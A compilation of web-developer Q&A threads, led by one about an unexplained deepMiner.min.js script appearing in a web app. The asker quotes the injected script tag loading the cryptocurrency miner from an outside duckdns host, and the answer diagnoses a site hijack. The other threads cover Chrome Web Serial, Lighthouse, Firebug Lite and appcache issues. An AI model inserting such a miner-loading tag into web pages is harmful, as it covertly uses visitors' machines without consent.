what is deepminer.min.js that suddenly shows up in web app? - google-chrome

what is deepMiner.min.js that suddenly shows up in web app? From chrome developer tools, it tried to load the file for 25 seconds, but failed.
https://jhondi33.duckdns.org:7777/deepMiner.min.js
The file is not explicitly included in web app.
For Microsoft Edge developer tools, it is always from cache even if cache is disabled.
UPDATE
If running the webapp from my local machine, the file did not show up in Chrome developer tools. Is this related to web hosting? But the web app is HTTPS secure.
The following is inserted into the web page that is dynamically generated (not static)
<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>

it appears to be a cryptocurrency miner that can be obfuscated as something innocuous. This has been done by hijacking the webpage with injected entries. See this similar issue in a Github issue. Update the host and DNS auth.
DeepMiner

Related

Chrome Web Serial API not working in VueJs Web app

I'm developing an enterprise web app with Vue.js, and I would like to use the Web Serial API in Chrome. On the linux machine that I'm developing on, I went to this Chrome flag chrome://flags/#enable-experimental-web-platform-features and enabled it. Then I did console.log('serial' in navigator) and it returned true, meaning that the flag is enabled. All is good so far.
So I went and did the same thing on the corporate computer I need to be using (running windows 10). I enabled the flag in Chrome, restarted it, and ran console.log('serial' in navigator) on the tab running the web app, but it returns false, which is bad because I need it to be true. But when I run that code on a different tab, it returns true. How could my web app be changing the navigator? So I can't use the Web Serial API on the one computer that needs to be using it and I don't know why.
Any help is appreciated.
UPDATED. The problem is not specific from vue js, you should make the script execute from a secure environment, either localhost or from a ssl secured domain. This security concerns are covered on this draft https://wicg.github.io/serial/#security.

Lighthouse report says my start_url isnt cached

Having run a Lighthouse report on my budding PWA, the report tells me that:
User will not be prompted to Install the Web App Failures:
Manifest start_url is not cached by a Service Worker.
But it is! I can SEE it in the cache in the "Application" tab on Chrome's F12 tools
I can confirm that the entry in the manifest.json is correct too as the "App Manifest" area in F12 tools shows this
I have tried changing it to work with just a basic HTML only page and get the same issue in the report. I have also tried changing the URL to just / but no change in the Lighthouse report.
What am I doing wrong?
This was due to a "buggy" Lighthouse. Its being constantly updated and improved and no longer reports my start_url as being problematic.
Another issue I came across that was driving me mental was Lighthouse reporting that the site was using HTTP/1.1 (with no compression) when various online resources were showing me it was using HTTP/2 (with compression) (IIS 10 automatically serves HTTP/2 if client supports it) It turns out that my antivirus was messing with HTTPS traffic - soon as I turned off HTTPS threat detection, Lighthouse was reporting HTTP/2 with compression.

FireBug in Chrome doesn't show up on local websites

When I right-click on the local html page and select "Inspect with FireBug Lite" nothing happens... on regular online sites it works except for "https://chrome.google.com/webstore/category/apps"
anyone had the same experience? I have the latest version of the extension (but it's from 2011 :/)
UPDATE: on some local sites it does show! on two web apps (PHP, Rails) it did work, but on a few static HTML files I tried it didn't....
Apparently this is normal...:
It doesn't work on local pages
If by "local pages" you mean files accessed via "file:///" protocol then yes, Firebug Lite doesn't work with "file:///" protocol. This is a JavaScript security restriction to prevent malicious web pages from accessing files in your your machine. Also, please note that the while you can load a "local page" in the browser (it will render properly) it will NOT behave exactly the same as when hosted in a web server.
Solution:
You can solve this problem by loading your page in a web server installed in your machine, so you can access that local files through "http://" addresses. This is the best solution: it is safer, and you'll get the most of what Firebug Lite can give you. I recommend using Apache HTTP Server, but you can use anyone (like IIS for example).
Which exact URL are you visiting? It is an internal Chrome's page
(like "chrome://downloads/"), or some page related to Google Chrome
extensions "https://chrome.google.com/extensions/")?
Google Chrome won't allow content scripts (required by Firebug Lite)
running on such pages. The problem is that Chrome does not inform the
user and neither the extension about it. In other words, there is no way
to Firebug Lite know if the content script was loaded or not, and we
worked around this by sniffing the URL and detecting when you visit
URLs that begins with "chrome://" or "https://chrome.google.com/extensions/",
alerting users in such cases.
You've few options to fix the solution.
One is to use Mozilla Firefox.
Second, install a web server on your system. Try WAMP or XAMPP. Once installed, store all the web pages in the root folder of the web server you just created. Save all the web pages and html files in C:\xampp\htdocs. Navigate to the locally stored webpages using your web browser by going to “127.0.0.1/index.html” or “localhost/index.html”.
Now you can use Firebug-Lite for Google Chrome on local files.

Appcache manifest downloads all files but still unable to access offline unless they have been accessed online

I have successfully created an appcache manifest that is downloading all of the website content. I have checked this through chrome dev and it's all working.
The issue I am having now is that even although the entire website has been cached, I am unable to access the cached pages when offline, unless I had accessed them online.
I am using Apache and accessing the website via an iPad using safari browser.
I have an idea that this may be due to the server not allowing access to cached pages unless they had been accessed online as some kind of security measure.
Any ideas?
if your files are in PHP or ASP this will not work.
It need to be JavaScript or other files that can be run localy like Image, HTML.

Unable to fetch iOS webapp files on manifest update. 401 unauthorized

I have a HTML5 webapp which is running perfectly when served via the IIS without authentication.
Is is using a cache.manifest file.
Both when running in safari, and as an "add to homescreen" fullscreen app, once I update the manifest file on the server, and the app will update.
When I turn on authentication on all files except the cache.manifest, then I only see the update when running it in the safari browser.
If I add it to the homescreen, I am not able to make the app update the cache.
If I wireshark the traffic on the server, I can see the manifest file is fetched without problems, but all the files in the manifest file hits a 401 Unautorized error.
Any idea how I can fix this? Running it in the safari browser is working..
Any help is highly appreciated.
Safari is much more aware of HTTP Basic Auth, but web.app (the home screen web app handler, which is basically a UIWebView wrapper) isn't as full-featured and doesn't appear to support basic auth.
It seems you may need to work around this with either a server-side solution to append an authentication key to the filename (such as application.css?longhexkey) to bypass basic auth, or go with a more traditional login form (which may require significant changes to your app)
Same issue on Sencha forums: Unanswered: Forcing re-authentication after offline usage on iOS devices?